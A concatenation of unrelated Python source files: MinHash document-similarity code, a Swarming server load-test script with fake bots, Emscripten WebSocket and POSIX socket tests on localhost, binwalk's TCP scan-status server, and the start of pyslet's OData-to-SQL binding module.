shingleIDSet = candidatesAsShingleSets[candidateID]
# The resulting minhash signature for this document.
signature = []
# For each of the random hash functions...
for i in range(0, numHashes):
# For each of the shingles actually in the document, calculate its hash code
# using hash function 'i'.
# Track the lowest hash ID seen. Initialize 'minHashCode' to be greater than
# the maximum possible value output by the hash.
minHashCode = nextPrime + 1
# For each shingle in the document...
for shingleID in shingleIDSet:
# Evaluate the hash function.
hashCode = (coeffA[i] * shingleID + coeffB[i]) % nextPrime
# Track the lowest hash code seen.
if hashCode < minHashCode:
minHashCode = hashCode
# Add the smallest hash code value as component number 'i' of the signature.
signature.append(minHashCode)
# Store the MinHash signature for this document.
#signatures.append(signature)
signatures[:,candidateID]=signature
# Calculate the elapsed time (in seconds)
elapsed = (time.time() - t0)
print(list(np.shape(signatures)))
print ("\nGenerating MinHash signatures took %.2fsec" % elapsed)
#print ('\nsignatures stored in a numpy array...')
# Creates a N x N matrix initialized to 0.
# Time this step.
t0 = time.time()
# For each of the test documents...
for i in range(10, 11):
#for i in range(0, numCandidates):
print(list(sorted_NE_container.keys())[i]+": ",end="")
# Get the MinHash signature for document i.
signature1 = signatures[i]
# For each of the other test documents...
for j in range(0, numCandidates):
if(j!=i):
# Get the MinHash signature for document j.
signature2 = signatures[j]
count = 0
# Count the number of positions in the minhash signature which are equal.
for k in range(0, numHashes):
count = count + (signature1[k] == signature2[k])
# Record the percentage of positions which matched.
estJSim= (count / numHashes)
#print(estJSim)
if (estJSim>=0.5):
print("=>"+list(sorted_NE_container.keys())[j]+", ",end="")
print()
# Calculate the elapsed time (in seconds)
elapsed = (time.time() - t0)
print ("\nComparing MinHash signatures took %.2fsec" % elapsed)'''
# In[ ]:
'''cap_phrases="Trump:Russia,Afgha"
words=re.split('[,:]', cap_phrases)
print(words)
candidateString='"BS'
p= re.compile(r'(".*?")[^\s]*[\s]*')
indices= (list( p.finditer(candidateString) ))
matches=[]
final=[]
if(indices):
for index in indices:
span= list(index.span())
#print(span[0])
matches+=[int(span[0]),int(span[1])]
print(matches)
final+=[candidateString[0:matches[0]]]
for i in range(len(matches)-1):
final+=[(candidateString[matches[i]:matches[i+1]]).strip()]
final+=[candidateString[matches[-1]:]]
final=list(filter(lambda strin: strin!="",final))
final=list(map(lambda strin: strin.strip(),final))
print(final)'''
# tweets=pd.read_csv("deduplicated_test.csv", header=0, index_col = 0 ,encoding = 'utf-8',delimiter=';')
# tweets=tweets[:1000:]
# Phase1= SatadishaModule()
# for i in range(2):
# Phase1= SatadishaModule()
# Phase1.extract(tweets,1)
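# A hypothetical end-to-end driver, sketched from the commented-out calls above.
# The CSV name, the ';' delimiter and the batch size are assumptions carried over
# from those example lines, not requirements of the module; extract() is assumed to
# return the (df_out, CTrie, time_in, time_out, phase2stopWordList) tuple built above.
#
# if __name__ == '__main__':
#     tweets = pd.read_csv("deduplicated_test.csv", header=0, index_col=0,
#                          encoding='utf-8', delimiter=';')
#     phase1 = SatadishaModule()
#     for batch, start in enumerate(range(0, len(tweets), 1000)):
#         chunk = tweets[start:start + 1000]
#         df_out, trie, t_in, t_out, stopwords = phase1.extract(chunk, batch)
#         print("batch %d processed in %.2f s" % (batch, t_out - t_in))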
|
swarming_load_test_bot.py
|
#!/usr/bin/env python
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Triggers a ton of fake jobs to test its handling under high load.
Generates an histogram with the latencies to process the tasks and number of
retries.
"""
import hashlib
import json
import logging
import optparse
import os
import Queue
import socket
import StringIO
import sys
import threading
import time
import zipfile
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(
__file__.decode(sys.getfilesystemencoding()))))
sys.path.insert(0, ROOT_DIR)
from third_party import colorama
import swarming
from utils import graph
from utils import net
from utils import threading_utils
# Line too long (NN/80)
# pylint: disable=C0301
OS_NAME = 'Comodore64'
TASK_OUTPUT = 'This task ran with great success'
def print_results(results, columns, buckets):
delays = [i for i in results if isinstance(i, float)]
failures = [i for i in results if not isinstance(i, float)]
print('%sDELAYS%s:' % (colorama.Fore.RED, colorama.Fore.RESET))
graph.print_histogram(
graph.generate_histogram(delays, buckets), columns, ' %.3f')
print('')
print('Total items : %d' % len(results))
average = 0
if delays:
average = sum(delays)/ len(delays)
print('Average delay: %s' % graph.to_units(average))
print('')
if failures:
print('%sEVENTS%s:' % (colorama.Fore.RED, colorama.Fore.RESET))
values = {}
for f in failures:
values.setdefault(f, 0)
values[f] += 1
graph.print_histogram(values, columns, ' %s')
print('')
def generate_version(source):
"""Generates the sha-1 based on the content of this zip.
Copied from ../utils/zip_package.py.
"""
h = hashlib.sha1()
with zipfile.ZipFile(source, 'r') as z:
for name in sorted(z.namelist()):
with z.open(name) as f:
h.update(str(len(name)))
h.update(name)
content = f.read()
h.update(str(len(content)))
h.update(content)
return h.hexdigest()
def calculate_version(url):
"""Retrieves the swarm_bot code and returns the SHA-1 for it."""
# Cannot use url_open() since zipfile requires .seek().
return generate_version(StringIO.StringIO(net.url_read(url)))
def get_hostname():
return socket.getfqdn().lower().split('.', 1)[0]
class FakeSwarmBot(object):
"""This is a Fake swarm_bot implementation simulating it is running
Comodore64.
It polls for job, acts as if it was processing them and return the fake
result.
"""
def __init__(
self, swarming_url, dimensions, swarm_bot_version_hash, hostname, index,
progress, duration, events, kill_event):
self._lock = threading.Lock()
self._swarming = swarming_url
self._index = index
self._progress = progress
self._duration = duration
self._events = events
self._kill_event = kill_event
self._bot_id = '%s-%d' % (hostname, index)
self._attributes = {
'dimensions': dimensions,
'id': self._bot_id,
# TODO(maruel): Use os_utilities.py.
'ip': '127.0.0.1',
'try_count': 0,
'version': swarm_bot_version_hash,
}
self._thread = threading.Thread(target=self._run, name='bot%d' % index)
self._thread.daemon = True
self._thread.start()
def join(self):
self._thread.join()
def is_alive(self):
return self._thread.is_alive()
def _run(self):
"""Polls the server and fake execution."""
try:
self._progress.update_item('%d alive' % self._index, bots=1)
while True:
if self._kill_event.is_set():
return
data = {'attributes': json.dumps(self._attributes)}
request = net.url_read(self._swarming + '/poll_for_test', data=data)
if request is None:
self._events.put('poll_for_test_empty')
continue
start = time.time()
try:
manifest = json.loads(request)
except ValueError:
self._progress.update_item('Failed to poll')
self._events.put('poll_for_test_invalid')
continue
commands = [c['function'] for c in manifest.get('commands', [])]
if not commands:
# Nothing to run.
self._events.put('sleep')
time.sleep(manifest['come_back'])
continue
if commands == ['UpdateSlave']:
# Calculate the proper SHA-1 and loop again.
# This could happen if the Swarming server is upgraded while this
# script runs.
self._attributes['version'] = calculate_version(
manifest['commands'][0]['args'])
self._events.put('update_slave')
continue
if commands != ['RunManifest']:
self._progress.update_item(
'Unexpected RPC call %s\n%s' % (commands, manifest))
self._events.put('unknown_rpc')
break
store_cmd = manifest['commands'][0]
if not isinstance(store_cmd['args'], unicode):
self._progress.update_item('Unexpected RPC manifest\n%s' % manifest)
self._events.put('unknown_args')
break
result_url = manifest['result_url']
test_run = json.loads(store_cmd['args'])
if result_url != test_run['result_url']:
self._progress.update_item(
'Unexpected result url: %s != %s' %
(result_url, test_run['result_url']))
self._events.put('invalid_result_url')
break
ping_url = test_run['ping_url']
ping_delay = test_run['ping_delay']
self._progress.update_item('%d processing' % self._index, processing=1)
# Fake activity and send pings as requested.
while True:
remaining = max(0, (start + self._duration) - time.time())
if remaining > ping_delay:
# Include empty data to ensure the request is a POST request.
result = net.url_read(ping_url, data={})
assert result == 'Success.', result
remaining = max(0, (start + self._duration) - time.time())
if not remaining:
break
time.sleep(remaining)
# In the old API, r=<task_id>&id=<bot_id> is passed as the url.
data = {
'o': TASK_OUTPUT,
'x': '0',
}
result = net.url_read(manifest['result_url'], data=data)
self._progress.update_item(
'%d processed' % self._index, processing=-1, processed=1)
if not result:
self._events.put('result_url_fail')
else:
assert result == 'Successfully update the runner results.', result
self._events.put(time.time() - start)
finally:
try:
# Unregister itself. Otherwise the server will have tons of fake bots
# that the admin will have to remove manually.
response = net.url_read(
self._swarming + '/delete_machine_stats',
data=[('r', self._bot_id)])
if response is None:
self._events.put('failed_unregister')
finally:
self._progress.update_item('%d quit' % self._index, bots=-1)
def main():
colorama.init()
parser = optparse.OptionParser(description=sys.modules[__name__].__doc__)
parser.add_option(
'-S', '--swarming',
metavar='URL', default='',
help='Swarming server to use')
parser.add_option(
'--suffix', metavar='NAME', default='', help='Bot suffix name to use')
swarming.add_filter_options(parser)
# Use improbable values to reduce the chance of interfering with real bots.
parser.set_defaults(
dimensions=[
('cpu', ['arm36']),
('hostname', socket.getfqdn()),
('os', OS_NAME),
])
group = optparse.OptionGroup(parser, 'Load generated')
group.add_option(
'--bots', type='int', default=300, metavar='N',
help='Number of swarming bots, default: %default')
group.add_option(
'-c', '--consume', type='float', default=60., metavar='N',
help='Duration (s) for consuming a request, default: %default')
parser.add_option_group(group)
group = optparse.OptionGroup(parser, 'Display options')
group.add_option(
'--columns', type='int', default=graph.get_console_width(), metavar='N',
help='For histogram display, default:%default')
group.add_option(
'--buckets', type='int', default=20, metavar='N',
help='Number of buckets for histogram display, default:%default')
parser.add_option_group(group)
parser.add_option(
'--dump', metavar='FOO.JSON', help='Dumps to json file')
parser.add_option(
'-v', '--verbose', action='store_true', help='Enables logging')
options, args = parser.parse_args()
logging.basicConfig(level=logging.INFO if options.verbose else logging.FATAL)
if args:
parser.error('Unsupported args: %s' % args)
options.swarming = options.swarming.rstrip('/')
if not options.swarming:
parser.error('--swarming is required.')
if options.consume <= 0:
parser.error('Needs --consume > 0. 0.01 is a valid value.')
swarming.process_filter_options(parser, options)
print(
'Running %d bots, each task lasting %.1fs' % (
options.bots, options.consume))
print('Ctrl-C to exit.')
print('[processing/processed/bots]')
columns = [('processing', 0), ('processed', 0), ('bots', 0)]
progress = threading_utils.Progress(columns)
events = Queue.Queue()
start = time.time()
kill_event = threading.Event()
swarm_bot_version_hash = calculate_version(options.swarming + '/bot_code')
hostname = get_hostname()
if options.suffix:
hostname += '-' + options.suffix
bots = [
FakeSwarmBot(
options.swarming, options.dimensions, swarm_bot_version_hash, hostname, i,
progress, options.consume, events, kill_event)
for i in range(options.bots)
]
try:
# Wait for all the bots to come alive.
while not all(s.is_alive() for s in bots):
time.sleep(0.01)
progress.update_item('Ready to run')
while bots:
progress.print_update()
time.sleep(0.01)
# The bots could be told to die.
bots = [s for s in bots if s.is_alive()]
except KeyboardInterrupt:
kill_event.set()
progress.update_item('Waiting for bots to quit.', raw=True)
progress.update_item('')
while bots:
progress.print_update()
bots = [s for s in bots if s.is_alive()]
# At this point, progress is not used anymore.
print('')
print('Ran for %.1fs.' % (time.time() - start))
print('')
results = list(events.queue)
print_results(results, options.columns, options.buckets)
if options.dump:
with open(options.dump, 'w') as f:
json.dump(results, f, separators=(',',':'))
return 0
if __name__ == '__main__':
sys.exit(main())
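# Hypothetical invocation (the server URL, bot count, duration and file name are
# placeholders, not project defaults beyond those documented in the options above):
#
#   ./swarming_load_test_bot.py -S https://example-swarming.appspot.com \
#       --bots 50 --consume 10 --suffix loadtest --dump latencies.json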
|
test_sockets.py
|
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import multiprocessing
import os
import socket
import shutil
import sys
import time
from subprocess import Popen, PIPE
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner sockets')
try:
import websockify
except Exception:
# websockify won't successfully import on Windows under Python3, because socketserver.py doesn't export ForkingMixIn.
# (On python2, ForkingMixIn was exported but it didn't actually work on Windows).
# Swallowing the error here means that this file can always be imported, but won't work if actually used on Windows,
# which is the same behavior as before.
pass
import clang_native
from common import BrowserCore, no_windows, create_file, test_file, read_file
from tools import shared, config, utils
from tools.shared import PYTHON, EMCC, path_from_root, WINDOWS, run_process, CLANG_CC
npm_checked = False
def clean_processes(processes):
for p in processes:
if (not hasattr(p, 'exitcode') or p.exitcode is None) and (not hasattr(p, 'returncode') or p.returncode is None):
# ask nicely (to try and catch the children)
try:
p.terminate() # SIGTERM
except OSError:
pass
time.sleep(1)
# send a forcible kill immediately afterwards. If the process did not die before, this should clean it.
try:
p.terminate() # SIGKILL
except OSError:
pass
class WebsockifyServerHarness():
def __init__(self, filename, args, listen_port, do_server_check=True):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.target_port = listen_port - 1
self.args = args or []
self.do_server_check = do_server_check
def __enter__(self):
# compile the server
# NOTE empty filename support is a hack to support
# the current test_enet
if self.filename:
proc = run_process([CLANG_CC, test_file(self.filename), '-o', 'server', '-DSOCKK=%d' % self.target_port] + clang_native.get_clang_native_args() + self.args, clang_native.get_clang_native_env(), stdout=PIPE, stderr=PIPE)
print('Socket server build: out:', proc.stdout, '/ err:', proc.stderr)
process = Popen([os.path.abspath('server')])
self.processes.append(process)
# start the websocket proxy
print('running websockify on %d, forward to tcp %d' % (self.listen_port, self.target_port), file=sys.stderr)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.listen_port, target_host="127.0.0.1", target_port=self.target_port, run_once=True)
self.websockify = multiprocessing.Process(target=wsp.start_server)
self.websockify.start()
self.processes.append(self.websockify)
# Make sure both the actual server and the websocket proxy are running
for i in range(10):
try:
if self.do_server_check:
server_sock = socket.create_connection(('localhost', self.target_port), timeout=1)
server_sock.close()
proxy_sock = socket.create_connection(('localhost', self.listen_port), timeout=1)
proxy_sock.close()
break
except IOError:
time.sleep(1)
else:
clean_processes(self.processes)
raise Exception('[Websockify failed to start up in a timely manner]')
print('[Websockify on process %s]' % str(self.processes[-2:]))
def __exit__(self, *args, **kwargs):
# try to kill the websockify proxy gracefully
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# clean up any processes we started
clean_processes(self.processes)
class CompiledServerHarness():
def __init__(self, filename, args, listen_port):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.args = args or []
def __enter__(self):
# assuming this is only used for WebSocket tests at the moment, validate that
# the ws module is installed
global npm_checked
if not npm_checked:
child = run_process(config.NODE_JS + ['-e', 'require("ws");'], check=False)
assert child.returncode == 0, '"ws" node module not found. you may need to run npm install'
npm_checked = True
# compile the server
proc = run_process([EMCC, '-Werror', test_file(self.filename), '-o', 'server.js', '-DSOCKK=%d' % self.listen_port] + self.args)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen(config.NODE_JS + ['server.js'])
self.processes.append(process)
def __exit__(self, *args, **kwargs):
# clean up any processes we started
clean_processes(self.processes)
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
# Executes a native executable server process
class BackgroundServerProcess():
def __init__(self, args):
self.processes = []
self.args = args
def __enter__(self):
print('Running background server: ' + str(self.args))
process = Popen(self.args)
self.processes.append(process)
def __exit__(self, *args, **kwargs):
clean_processes(self.processes)
def NodeJsWebSocketEchoServerProcess():
return BackgroundServerProcess(config.NODE_JS + [test_file('websocket/nodejs_websocket_echo_server.js')])
def PythonTcpEchoServerProcess(port):
return BackgroundServerProcess([PYTHON, test_file('websocket/tcp_echo_server.py'), port])
class sockets(BrowserCore):
emcc_args = []
@classmethod
def setUpClass(cls):
super().setUpClass()
print()
print('Running the socket tests. Make sure the browser allows popups from localhost.')
print()
# Use emscripten root for node module lookup. This is needed because the unit tests each
# run with CWD set to a temporary directory outside the emscripten tree.
print('Setting NODE_PATH=' + path_from_root('node_modules'))
os.environ['NODE_PATH'] = path_from_root('node_modules')
def test_sockets_echo(self, extra_args=[]):
sockets_include = '-I' + test_file('sockets')
# Note: in the WebsockifyServerHarness and CompiledServerHarness tests below, explicitly use consecutive server listen ports,
# because server teardown might not occur deterministically (python dtor time) and is a bit racy.
# WebsockifyServerHarness uses two port numbers, x and x-1, so increment it by two.
# CompiledServerHarness only uses one. Start with 49160 & 49159 as the first server port addresses. If adding new tests,
# increment the used port addresses below.
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49161), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49162), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1'], 49163), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include], 49160), 0)]
for harness, datagram in harnesses:
with harness:
self.btest(test_file('sockets/test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, sockets_include])
def test_sockets_echo_pthreads(self, extra_args=[]):
self.test_sockets_echo(['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
def test_sdl2_sockets_echo(self):
harness = CompiledServerHarness('sdl2_net_server.c', ['-sUSE_SDL=2', '-sUSE_SDL_NET=2'], 49164)
with harness:
self.btest('sdl2_net_client.c', expected='0', args=['-sUSE_SDL=2', '-sUSE_SDL_NET=2', '-DSOCKK=%d' % harness.listen_port])
def test_sockets_async_echo(self):
sockets_include = '-I' + test_file('sockets')
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ASYNC=1'], 49167), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1', '-DTEST_ASYNC=1'], 49168), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1', '-DTEST_ASYNC=1'], 49169), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_ASYNC=1'], 49166), 0)]
for harness, datagram in harnesses:
print('harness:', harness)
with harness:
self.btest(test_file('sockets/test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, '-DTEST_ASYNC=1', sockets_include])
# Deliberately attempt a connection on a port that will fail to test the error callback and getsockopt
print('expect fail')
self.btest(test_file('sockets/test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=49169', '-DTEST_ASYNC=1', sockets_include])
def test_sockets_echo_bigdata(self):
sockets_include = '-I' + test_file('sockets')
# generate a large string literal to use as our message
message = ''
for i in range(256 * 256 * 2):
message += str(chr(ord('a') + (i % 26)))
# re-write the client test with this literal (it's too big to pass via command line)
input_filename = test_file('sockets/test_sockets_echo_client.c')
input = read_file(input_filename)
create_file('test_sockets_echo_bigdata.c', input.replace('#define MESSAGE "pingtothepong"', '#define MESSAGE "%s"' % message))
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49172), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49173), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include], 49171), 0)]
for harness, datagram in harnesses:
with harness:
self.btest('test_sockets_echo_bigdata.c', expected='0', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram])
@no_windows('This test is Unix-specific.')
def test_sockets_partial(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_partial_server.c'), [], 49180),
CompiledServerHarness(test_file('sockets/test_sockets_partial_server.c'), [], 49181)
]:
with harness:
self.btest_exit(test_file('sockets/test_sockets_partial_client.c'), assert_returncode=165, args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_down(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_select_server_down_server.c'), [], 49190, do_server_check=False),
CompiledServerHarness(test_file('sockets/test_sockets_select_server_down_server.c'), [], 49191)
]:
with harness:
self.btest(test_file('sockets/test_sockets_select_server_down_client.c'), expected='266', args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_closes_connection_rw(self):
sockets_include = '-I' + test_file('sockets')
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49200),
CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49201)
]:
with harness:
self.btest(test_file('sockets/test_sockets_select_server_closes_connection_client_rw.c'), expected='266', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port])
@no_windows('This test uses Unix-specific build architecture.')
def test_enet(self):
# this is also a good test of raw usage of emconfigure and emmake
shared.try_delete('enet')
shutil.copytree(test_file('third_party', 'enet'), 'enet')
with utils.chdir('enet'):
self.run_process([path_from_root('emconfigure'), './configure', '--disable-shared'])
self.run_process([path_from_root('emmake'), 'make'])
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + self.in_dir('enet', 'include')]
for harness in [
CompiledServerHarness(test_file('sockets/test_enet_server.c'), enet, 49210)
]:
with harness:
self.btest(test_file('sockets/test_enet_client.c'), expected='0', args=enet + ['-DSOCKK=%d' % harness.listen_port])
def test_nodejs_sockets_echo(self):
# This test checks that sockets work when the client code is run in Node.js
if config.NODE_JS not in config.JS_ENGINES:
self.skipTest('node is not present')
sockets_include = '-I' + test_file('sockets')
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 59162), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 59164), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include], 59160), 0)]
# Basic test of node client against both a Websockified and compiled echo server.
for harness, datagram in harnesses:
with harness:
expected = 'do_msg_read: read 14 bytes'
self.do_runf(test_file('sockets/test_sockets_echo_client.c'), expected, emcc_args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram])
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
# Test against a Websockified server with compile time configured WebSocket subprotocol. We use a Websockified
      # server because, as long as the subprotocol list contains binary, it will configure itself to accept binary.
# This test also checks that the connect url contains the correct subprotocols.
print("\nTesting compile time WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include], 59166)
]:
with harness:
self.run_process([EMCC, '-Werror', test_file('sockets/test_sockets_echo_client.c'), '-o', 'client.js', '-sSOCKET_DEBUG', '-sWEBSOCKET_SUBPROTOCOL="base64, binary"', '-DSOCKK=59166'])
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained(['connect: ws://127.0.0.1:59166, base64,binary', 'connect: ws://127.0.0.1:59166/, base64,binary'], out)
# Test against a Websockified server with runtime WebSocket configuration. We specify both url and subprotocol.
# In this test we have *deliberately* used the wrong port '-DSOCKK=12345' to configure the echo_client.c, so
# the connection would fail without us specifying a valid WebSocket URL in the configuration.
print("\nTesting runtime WebSocket configuration.\n")
create_file('websocket_pre.js', '''
var Module = {
websocket: {
url: 'ws://localhost:59168/testA/testB',
subprotocol: 'text, base64, binary',
}
};
''')
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [sockets_include], 59168)
]:
with harness:
self.run_process([EMCC, '-Werror', test_file('sockets/test_sockets_echo_client.c'), '-o', 'client.js', '--pre-js=websocket_pre.js', '-sSOCKET_DEBUG', '-DSOCKK=12345'])
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained('connect: ws://localhost:59168/testA/testB, text,base64,binary', out)
# Test Emscripten WebSockets API to send and receive text and binary messages against an echo server.
# N.B. running this test requires 'npm install ws' in Emscripten root directory
def test_websocket_send(self):
with NodeJsWebSocketEchoServerProcess():
self.btest(test_file('websocket/test_websocket_send.c'), expected='101', args=['-lwebsocket', '-sNO_EXIT_RUNTIME', '-sWEBSOCKET_DEBUG'])
# Test that native POSIX sockets API can be used by proxying calls to an intermediate WebSockets -> POSIX sockets bridge server
def test_posix_proxy_sockets(self):
# Build the websocket bridge server
self.run_process(['cmake', path_from_root('tools/websocket_to_posix_proxy')])
self.run_process(['cmake', '--build', '.'])
if os.name == 'nt': # This is not quite exact, instead of "isWindows()" this should be "If CMake defaults to building with Visual Studio", but there is no good check for that, so assume Windows==VS.
proxy_server = os.path.join(self.get_dir(), 'Debug', 'websocket_to_posix_proxy.exe')
else:
proxy_server = os.path.join(self.get_dir(), 'websocket_to_posix_proxy')
with BackgroundServerProcess([proxy_server, '8080']):
with PythonTcpEchoServerProcess('7777'):
# Build and run the TCP echo client program with Emscripten
self.btest(test_file('websocket/tcp_echo_client.cpp'), expected='101', args=['-lwebsocket', '-sPROXY_POSIX_SOCKETS', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
|
statuserver.py
|
# Provides scan status information via a TCP socket service.
# Currently only works for signature scans.
import time
import errno
import threading
import binwalk.core.common
import binwalk.core.compat
# Python 2/3 compatibility
try:
import SocketServer
except ImportError:
import socketserver as SocketServer
class StatusRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
message_format = "%s %3d%% [ %d / %d ]"
last_status_message_len = 0
status_message = ''
message_sent = False
self.server.binwalk.status.running = True
while True:
time.sleep(0.1)
try:
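                # Erase the previously drawn status line: back up over it,
                # overwrite it with spaces, then back up again before the
                # fresh status message is written below.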
self.request.send(binwalk.core.compat.str2bytes('\b' * last_status_message_len))
self.request.send(binwalk.core.compat.str2bytes(' ' * last_status_message_len))
self.request.send(binwalk.core.compat.str2bytes('\b' * last_status_message_len))
if self.server.binwalk.status.shutdown:
self.server.binwalk.status.finished = True
break
if self.server.binwalk.status.total != 0:
percentage = ((float(self.server.binwalk.status.completed) / float(self.server.binwalk.status.total)) * 100)
status_message = message_format % (self.server.binwalk.status.fp.path,
percentage,
self.server.binwalk.status.completed,
self.server.binwalk.status.total)
elif not message_sent:
status_message = "No status information available at this time!"
else:
continue
last_status_message_len = len(status_message)
self.request.send(binwalk.core.compat.str2bytes(status_message))
message_sent = True
except IOError as e:
if e.errno == errno.EPIPE:
break
except Exception as e:
binwalk.core.common.debug('StatusRequestHandler exception: ' + str(e) + '\n')
except KeyboardInterrupt as e:
raise e
self.server.binwalk.status.running = False
return
class ThreadedStatusServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
daemon_threads = True
allow_reuse_address = True
class StatusServer(object):
def __init__(self, port, binwalk):
self.server = ThreadedStatusServer(('127.0.0.1', port), StatusRequestHandler)
self.server.binwalk = binwalk
t = threading.Thread(target=self.server.serve_forever)
        t.daemon = True
t.start()
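# Illustrative sketch (not part of binwalk): a minimal client for the status
# service above. The function name and default port are hypothetical; it
# assumes a StatusServer is already listening on that port. Because the
# handler repeatedly erases and rewrites a single status line, a client only
# needs to read raw bytes and echo them to its own terminal.
def _example_status_client(port=9876, host='127.0.0.1'):
    import socket
    import sys
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    try:
        while True:
            data = s.recv(4096)
            if not data:
                break  # server went away or the scan finished
            sys.stdout.write(data.decode('latin-1'))
            sys.stdout.flush()
    finally:
        s.close()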
|
sqlds.py
|
#! /usr/bin/env python
"""Binds the OData API to the Python DB API."""
import decimal
import hashlib
import io
import itertools
import logging
import math
import os.path
import sqlite3
import sys
import threading
import time
import traceback
import warnings
from .. import blockstore
from .. import iso8601 as iso
from ..http import params
from ..py2 import (
buffer2,
dict_items,
dict_values,
is_text,
range3,
to_text)
from ..vfs import OSFilePath
from . import core
from . import csdl as edm
from . import metadata as edmx
# rebind the module-level name so that the logging.info/error/debug calls
# below go to the 'pyslet.odata2.sqlds' logger rather than the root logger
logging = logging.getLogger('pyslet.odata2.sqlds')
#: the standard timeout while waiting for a database connection, in seconds
SQL_TIMEOUT = 90
class SQLError(Exception):
"""Base class for all module exceptions."""
pass
class DatabaseBusy(SQLError):
"""Raised when a database connection times out."""
pass
SQLOperatorPrecedence = {
',': 0,
'OR': 1,
'AND': 2,
'NOT': 3,
'=': 4,
'<>': 4,
'<': 4,
'>': 4,
'<=': 4,
'>=': 4,
'LIKE': 4,
'+': 5,
'-': 5,
'*': 6,
'/': 6
}
"""Look-up table for SQL operator precedence calculations.
The keys are strings representing the operator, the values are
integers that allow comparisons for operator precedence. For
example::
SQLOperatorPrecedence['+']<SQLOperatorPrecedence['*']
SQLOperatorPrecedence['<']==SQLOperatorPrecedence['>']"""
class UnparameterizedLiteral(core.LiteralExpression):
"""Class used as a flag that this literal is safe and does not need
to be parameterized.
This is used in the query converter to prevent things like this
happening when the converter itself constructs a LIKE expression::
"name" LIKE ?+?+? ; params=['%', "Smith", '%']"""
pass
class SQLParams(object):
"""An abstract class used to build parameterized queries.
Python's DB API supports three different conventions for specifying
parameters and each module indicates the convention in use. The SQL
construction methods in this module abstract away this variability
for maximum portability using different implementations of the basic
SQLParams class."""
def __init__(self):
